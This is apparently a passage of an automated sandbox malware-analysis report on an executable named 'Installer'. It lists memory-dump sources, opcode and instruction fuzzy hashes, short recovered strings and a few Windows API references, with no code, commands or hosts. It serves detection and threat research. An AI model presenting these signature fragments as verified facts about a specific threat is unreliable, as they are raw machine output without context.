                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00427B68
                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00427C72
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D120339608250DFC708CF28E8A166AF7F2FB8A314F09857EE98987351D734D955CB89
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: cu16
                                                                                                                                                                                                                                                    • API String ID: 0-1393213281
                                                                                                                                                                                                                                                    • Opcode ID: a8b42d00aa42b6c5f4fdbec2012c9a4f829a243eac6bcdfeac6ada73ec91b821
                                                                                                                                                                                                                                                    • Instruction ID: b47343fc74fa199a2dd3296f085def7190a0f10b9a04de121b961ff035c16150
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8b42d00aa42b6c5f4fdbec2012c9a4f829a243eac6bcdfeac6ada73ec91b821
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6F10136608251DFC704CF28D8A066AF7F2FB8A318F09897EE58987351C735E955CB89
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: cu16
                                                                                                                                                                                                                                                    • API String ID: 0-1393213281
                                                                                                                                                                                                                                                    • Opcode ID: 2fdcadc8431d5e275e97618014f6d9204e5a36a54ec6d05914a11fb32c429fef
                                                                                                                                                                                                                                                    • Instruction ID: a8adab88cd6467e8744eccda8f8671d0fd7897d1ea11a103ef712ebcb60b2b94
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fdcadc8431d5e275e97618014f6d9204e5a36a54ec6d05914a11fb32c429fef
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3CE100366082508FD304CF38D89066BFBE2EB8A314F09897EE99987351D735D905CB89
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: cu16
                                                                                                                                                                                                                                                    • API String ID: 0-1393213281
                                                                                                                                                                                                                                                    • Opcode ID: 7970cd6754f9a29d7eb6efe6f2f2c38251dbb01199b4c91cf1d898bcd2063352
                                                                                                                                                                                                                                                    • Instruction ID: a6b8655c2d4fe843f733019638999d7a326d799a2e10267b81ba0de51ceb402d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7970cd6754f9a29d7eb6efe6f2f2c38251dbb01199b4c91cf1d898bcd2063352
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41E10136608250DFD704CF28D8A066AFBE2FB8A314F09897EE59987351C735E915CB89
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: -.-2
                                                                                                                                                                                                                                                    • API String ID: 0-2838677626
                                                                                                                                                                                                                                                    • Opcode ID: 84298f2c1df00ac477d8c9eb7f651bf770509cc0667fa7c23a1cbe41850e76cc
                                                                                                                                                                                                                                                    • Instruction ID: c65bc0e0fd9ab2b407f4ec274a243cae03b52599eb44c3ec4b920f3608bc9bdb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84298f2c1df00ac477d8c9eb7f651bf770509cc0667fa7c23a1cbe41850e76cc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08912770694B804FE335CF768880763BBE3AB96314F18896DD0D28BB95DB79E446CB14
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                                                                    • API String ID: 0-123907689
                                                                                                                                                                                                                                                    • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                    • Instruction ID: 981523987b1e43f0f2fbc980dbd505f4044b7fe8cc5f065e6a15477f38c1429d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4071C632B083258BD714CE28E49032FB7E2EBC5750FA9856EE89497395D338DD4587CA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: v4vE
                                                                                                                                                                                                                                                    • API String ID: 0-866190975
                                                                                                                                                                                                                                                    • Opcode ID: 7b64acfa24e2befdd8ac35dee43b38dc2d497a1a5a96ae3d147eba01d7514725
                                                                                                                                                                                                                                                    • Instruction ID: 34cdfc8a34f78da73259cccf7ab61d51709751dea84dcafbc9ea7b9c9e951e0c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b64acfa24e2befdd8ac35dee43b38dc2d497a1a5a96ae3d147eba01d7514725
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D631F4B6A183005BF708DF76AC8255BBAF3EBD5304F19C43DD185D7215EA38C1068B4A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: /kB
                                                                                                                                                                                                                                                    • API String ID: 0-3532343839
                                                                                                                                                                                                                                                    • Opcode ID: b4b5b7e280f642f85b3dfe5987f8b3969132ef151dffa41fcba20c5fda879f96
                                                                                                                                                                                                                                                    • Instruction ID: 30b78e98d0376e77b4dedd947e5e84c4a76dc6197d8d4778f9e0425fae07882d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4b5b7e280f642f85b3dfe5987f8b3969132ef151dffa41fcba20c5fda879f96
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA1159B4E093649FC320AB25A8D017B76A5DF97314F85852FF9C367361EA3C9C02C65A
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C3123B5A04300AFE7109E119CC1B3BB7B5EB89758F10182EF9C5A3201D339EC26879B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 83a46eb97a1ede892c521cd0a1cf27060ef79bfacc0411b261445066a2a95deb
                                                                                                                                                                                                                                                    • Instruction ID: 37f3efdb486df1b50b7503efc8676e0e0480c9f1302ca175b3bd99bebac416ea
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83a46eb97a1ede892c521cd0a1cf27060ef79bfacc0411b261445066a2a95deb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF4190216493494BEB14CD2889815E77B61DBA2350F08C63EECC55B3C1EA3CDA0AD3A9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b8bd4d7e9bd20bf13d05e542f28e56da8f4d605b247b1b6829d47043411abe16
                                                                                                                                                                                                                                                    • Instruction ID: 65860a534bcdc61a69b891c8f4b112b5ccb7c4aa6a6d252a23f247d29c97b397
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8bd4d7e9bd20bf13d05e542f28e56da8f4d605b247b1b6829d47043411abe16
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8410436F245554BDB0CCF6888A157FBAB2AB8E310F19E13EC556E7354CB3899058788
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                                                                                    • Opcode ID: 7429881085838c9e2ea473406c0e777441f7560d71a7cb9971c1e3e1e517dda0
                                                                                                                                                                                                                                                    • Instruction ID: 8192ad4da6690d975133d58e89ccec5cc32f62d7e28f0f863b58bcb031853df0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7429881085838c9e2ea473406c0e777441f7560d71a7cb9971c1e3e1e517dda0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64313938B556018FC725CB68CCC0B3673A3EBD6315B589639E092673D6DB38E8068788
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8820827ab3717a503f23ee1f329a572c2ac425d8331617b1f9b573c8837ef006
                                                                                                                                                                                                                                                    • Instruction ID: 6483a22a6f500d058f9f4f03b7d1e0b0debdf2b506a58ba5144e8a59cc6fe5a8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8820827ab3717a503f23ee1f329a572c2ac425d8331617b1f9b573c8837ef006
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF31C432E00125CFCB14CF64C8516AFB7B2FF46310F19959AD842AB3A1DB385D01CB94
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 311bccfb7c94d63f981d42372d52fcc226d8c5098601f3624a1e21d790acd581
                                                                                                                                                                                                                                                    • Instruction ID: daeb1bb460313cd135989d5d7c02351c17a175b5b9fd5c5575e707a8a0bfda13
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 311bccfb7c94d63f981d42372d52fcc226d8c5098601f3624a1e21d790acd581
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C1178217082110AC3249BA9C8C1177F399DBDE724F19967BD9C08F292E2B8CC42C3D5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                    • Instruction ID: 91ac4c5b143b02c7d32e682e2a6aab4e0f1bc94368da354689b67666a2c00c8c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6311EC336451D50EC3168D3C84005A67FA30B97234F1AD39EF8B49B2D3D7278D8A8359
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2ee26b68ca80d359eea836c05570f0252371bc8a0c72456eea12c8fb01481f6b
                                                                                                                                                                                                                                                    • Instruction ID: 9eb9525df2382ca65ffc71ea0fe4effccc3bbe68bdeaf4085e84a9653100f2a1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ee26b68ca80d359eea836c05570f0252371bc8a0c72456eea12c8fb01481f6b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8019EF5B0031247D6209E11A4C4B2BB2A9AF90748F5D443EEC8457342DB7DFC2482AF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d5d295e9ed382b796e59e78ecd7c3973d9fbade591b377e9c3dd8d664adeac99
                                                                                                                                                                                                                                                    • Instruction ID: fe22f187d6262aa03d792ec1030457158b6d731bbaaa7045d526425db3de230e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5d295e9ed382b796e59e78ecd7c3973d9fbade591b377e9c3dd8d664adeac99
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D01F46B7A831A0BD700DDBDECD56AAB7A696D5108B1E4139EA80D7781E0B8F8058294
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 4230b21a2fd02e58cc7b406f354e8a131570180303f77ccb7a9505112db3ad99
                                                                                                                                                                                                                                                    • Instruction ID: 18454f57bc8bd7713fef9fb37d3191b327954915f6893786146af46e59a98f16
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4230b21a2fd02e58cc7b406f354e8a131570180303f77ccb7a9505112db3ad99
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA01B53560E710DFC7188B24948093FB3B2FB9A324FA5556CD59123261D330ED028BCE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 75cdd2821561e72d22e9e4a155e993369658370f557c2a38552048b2028693a2
                                                                                                                                                                                                                                                    • Instruction ID: 6fca0e276dc41d176f9258a46a62d3d95cdd6612b9affbec5bcc6b9929d5356f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75cdd2821561e72d22e9e4a155e993369658370f557c2a38552048b2028693a2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3001DF30A096209BC7088B14A48053FF3B2EF8B720FD5552DE68667251C335ED028B8E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bfa1d9da91f22f173d497c8b9dff6cb2ad0c54e4f2a9c7da531a3c1cc58556e0
                                                                                                                                                                                                                                                    • Instruction ID: 79179b24096eac5e6ac07bd72d819e76adb0a4e00d37c96423816886d630571d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfa1d9da91f22f173d497c8b9dff6cb2ad0c54e4f2a9c7da531a3c1cc58556e0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7012B3AA519904BC718CF39DC91AE573A1F797305F19A6BCC406E7274EE3499058B48
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                    • String ID: $"$%$-$3$4$`$b$d$f$j$l$m$n
                                                                                                                                                                                                                                                    • API String ID: 2610073882-388534048
                                                                                                                                                                                                                                                    • Opcode ID: 0d47e0fe30014c20ce2d32c7426541ef57348e46fc9c568ff5466d38f1117a37
                                                                                                                                                                                                                                                    • Instruction ID: 0ed16d0090aa2853db3fa94cf8c83c94d7f5a066e2027e59c45352e3d5823b27
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d47e0fe30014c20ce2d32c7426541ef57348e46fc9c568ff5466d38f1117a37
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C415C612087C1CED725CF38C889346BFA2AB62314F08C69DD8E54F39BD279D516C762
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                    • String ID: $"$%$-$3$4$`$b$d$f$j$l$m$n
                                                                                                                                                                                                                                                    • API String ID: 2610073882-388534048
                                                                                                                                                                                                                                                    • Opcode ID: ae5400dcd5d302ef961202c0a16dd426301db3ee827d1cb557e1cc8c01814538
                                                                                                                                                                                                                                                    • Instruction ID: cf5d184b347ae60a31a8e7b64644b3d0961cef50304e460fca956dadef895e24
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae5400dcd5d302ef961202c0a16dd426301db3ee827d1cb557e1cc8c01814538
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F413C612087C08ED726CF3CC885346BFE1AB66314F08869DD8E58F39BD275D516C766
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                    • String ID: G$glhm$kdge
                                                                                                                                                                                                                                                    • API String ID: 3664257935-3790318392
                                                                                                                                                                                                                                                    • Opcode ID: efda84222cddbdac5fe667d835128501f3c90b1fd491eb25eb067e342f112da9
                                                                                                                                                                                                                                                    • Instruction ID: bfd15d46e1ac39dd06e1a04889429419f0e65eafd70abaf615cf56b171db5900
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efda84222cddbdac5fe667d835128501f3c90b1fd491eb25eb067e342f112da9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C451267060C3919FE311CB25D850B6BBFD0EFA6300F14486DF5C5AB392D2B98805CB56
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004248C1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                    • String ID: ha$ha$q
                                                                                                                                                                                                                                                    • API String ID: 237503144-2525095540
                                                                                                                                                                                                                                                    • Opcode ID: 2afdf2c7a496911d1016a4b7ad03343ecd8edc0553639cf8e445061b07e4d96e
                                                                                                                                                                                                                                                    • Instruction ID: c658e200b3172b2c4a4d6f089079a709458a382cdb7082564cb6dc42ecfb3a23
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2afdf2c7a496911d1016a4b7ad03343ecd8edc0553639cf8e445061b07e4d96e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B731D575A00211CFDB10CF98D881BAE7BB1FF49714F158079E914AF396DB75D8028B95
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
